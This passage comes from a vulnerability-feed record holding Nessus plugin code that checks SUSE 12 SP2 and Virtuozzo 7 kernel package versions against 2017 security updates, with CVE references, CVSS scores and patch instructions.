attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1020657\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1021424\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1022476\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1022743\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1022967\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1023175\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1024405\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1028173\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1028286\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1029693\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1030552\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1030850\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1031515\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1031717\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1031784\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1033587\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1034048\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1034075\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1034762\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1036303\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1036632\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1037344\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1037404\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1037994\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1038078\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1038583\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1038616\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1038792\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1039915\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1040307\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1040351\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1041958\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1042286\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1042314\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1042422\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1042778\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1043652\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1044112\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1044636\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1045154\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1045563\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1045922\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1046682\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1046821\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1046985\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1047027\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1047048\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1047096\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1047118\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1047121\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1047152\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1047277\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1047343\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1047354\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1047487\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1047651\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1047653\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1047670\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1048155\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1048221\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1048317\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1048891\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1048893\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1048914\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1048934\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1049226\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1049483\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1049486\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1049580\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1049603\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1049645\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1049882\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1050061\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1050188\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1051022\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1051059\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1051239\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1051399\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1051478\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1051479\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1051556\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1051663\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1051790\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1052049\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1052223\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1052533\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1052580\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1052593\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1052709\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1052773\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1052794\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1052888\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1053117\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1053802\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1053915\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1053919\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1054084\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1055013\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1055096\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1055359\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1055493\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1055755\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1055896\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1056261\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1056588\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1056827\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1056982\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1057015\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1058038\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1058116\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1058410\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1058507\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1059051\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1059465\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1060197\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1061017\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1061046\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1061064\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1061067\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1061172\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1061831\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1061872\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1063667\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1064206\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1064388\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=964063\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=971975\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=974215\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=981309\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-1000252/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-10810/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-11472/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-11473/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-12134/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-12153/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-12154/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-13080/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-14051/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-14106/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-14489/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-15649/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-7518/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-7541/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-7542/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-8831/\"\n );\n # https://www.suse.com/support/update/announcement/2017/suse-su-20172869-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?baed955d\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Workstation Extension 12-SP2:zypper in -t patch\nSUSE-SLE-WE-12-SP2-2017-1786=1\n\nSUSE Linux Enterprise Software Development Kit 12-SP2:zypper in -t\npatch SUSE-SLE-SDK-12-SP2-2017-1786=1\n\nSUSE Linux Enterprise Server for Raspberry Pi 12-SP2:zypper in -t\npatch SUSE-SLE-RPI-12-SP2-2017-1786=1\n\nSUSE Linux Enterprise Server 12-SP2:zypper in -t patch\nSUSE-SLE-SERVER-12-SP2-2017-1786=1\n\nSUSE Linux Enterprise Live Patching 12:zypper in -t patch\nSUSE-SLE-Live-Patching-12-2017-1786=1\n\nSUSE Linux Enterprise High Availability 12-SP2:zypper in -t patch\nSUSE-SLE-HA-12-SP2-2017-1786=1\n\nSUSE Linux Enterprise Desktop 12-SP2:zypper in -t patch\nSUSE-SLE-DESKTOP-12-SP2-2017-1786=1\n\nSUSE Container as a Service Platform ALL:zypper in -t patch\nSUSE-CAASP-ALL-2017-1786=1\n\nOpenStack Cloud Magnum Orchestration 7:zypper in -t patch\nSUSE-OpenStack-Cloud-Magnum-Orchestration-7-2017-1786=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-extra\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-extra-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-man\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-syms\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/03/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/10/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/10/30\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"II\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED12|SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED12 / SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(2)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP2\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED12\" && (! preg(pattern:\"^(2)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED12 SP2\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"s390x\", reference:\"kernel-default-man-4.4.90-92.45.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"kernel-default-4.4.90-92.45.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"kernel-default-base-4.4.90-92.45.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"kernel-default-base-debuginfo-4.4.90-92.45.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"kernel-default-debuginfo-4.4.90-92.45.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"kernel-default-debugsource-4.4.90-92.45.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"kernel-default-devel-4.4.90-92.45.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"kernel-syms-4.4.90-92.45.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-default-4.4.90-92.45.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-default-debuginfo-4.4.90-92.45.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-default-debugsource-4.4.90-92.45.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-default-devel-4.4.90-92.45.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-default-extra-4.4.90-92.45.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-default-extra-debuginfo-4.4.90-92.45.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-syms-4.4.90-92.45.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-01-06T09:13:15", "description": "According to the version of the vzkernel package and the\nreadykernel-patch installed, the Virtuozzo installation on the remote\nhost is affected by the following vulnerabilities :\n\n - ChunYu Wang from Red Hat found a netlink use-after-free\n issue by syzkaller. Access to already freed memory\n (groups in struct netlink_sock) could cause host crash\n or memory corruption.\n\n - An unprivileged user inside a container could cause a\n denial of service (kernel crash in user_read()\n function) using a specially crafted sequence of system\n calls.\n\n - The iscsi_if_rx function in\n drivers/scsi/scsi_transport_iscsi.c in the Linux kernel\n through 4.13.2 allows local users to cause a denial of\n service (panic) by leveraging incorrect length\n validation.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Virtuozzo security advisory.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 33, "cvss3": {"score": 5.5, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"}, "published": "2017-09-25T00:00:00", "title": "Virtuozzo 7 : readykernel-patch (VZA-2017-083)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-14489"], "modified": "2017-09-25T00:00:00", "cpe": ["cpe:/o:virtuozzo:virtuozzo:7", "p-cpe:/a:virtuozzo:virtuozzo:readykernel"], "id": "VIRTUOZZO_VZA-2017-083.NASL", "href": "https://www.tenable.com/plugins/nessus/103426", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(103426);\n script_version(\"3.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\n \"CVE-2017-14489\"\n );\n\n script_name(english:\"Virtuozzo 7 : readykernel-patch (VZA-2017-083)\");\n script_summary(english:\"Checks the readykernel output for the updated patch.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Virtuozzo host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the version of the vzkernel package and the\nreadykernel-patch installed, the Virtuozzo installation on the remote\nhost is affected by the following vulnerabilities :\n\n - ChunYu Wang from Red Hat found a netlink use-after-free\n issue by syzkaller. Access to already freed memory\n (groups in struct netlink_sock) could cause host crash\n or memory corruption.\n\n - An unprivileged user inside a container could cause a\n denial of service (kernel crash in user_read()\n function) using a specially crafted sequence of system\n calls.\n\n - The iscsi_if_rx function in\n drivers/scsi/scsi_transport_iscsi.c in the Linux kernel\n through 4.13.2 allows local users to cause a denial of\n service (panic) by leveraging incorrect length\n validation.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Virtuozzo security advisory.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://help.virtuozzo.com/customer/portal/articles/2878783\");\n # https://readykernel.com/patch/Virtuozzo-7/readykernel-patch-18.7-31.1-1.vl7/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?108c3980\");\n # https://readykernel.com/patch/Virtuozzo-7/readykernel-patch-20.18-31.1-1.vl7/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?3feb80ce\");\n # https://readykernel.com/patch/Virtuozzo-7/readykernel-patch-30.10-31.1-1.vl7/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?22e57864\");\n # https://readykernel.com/patch/Virtuozzo-7/readykernel-patch-30.15-31.1-1.vl7/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4ac0fd0e\");\n # https://readykernel.com/patch/Virtuozzo-7/readykernel-patch-33.22-31.1-1.vl7/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c85a3bea\");\n script_set_attribute(attribute:\"solution\", value:\"Update the readykernel patch.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H\");\n 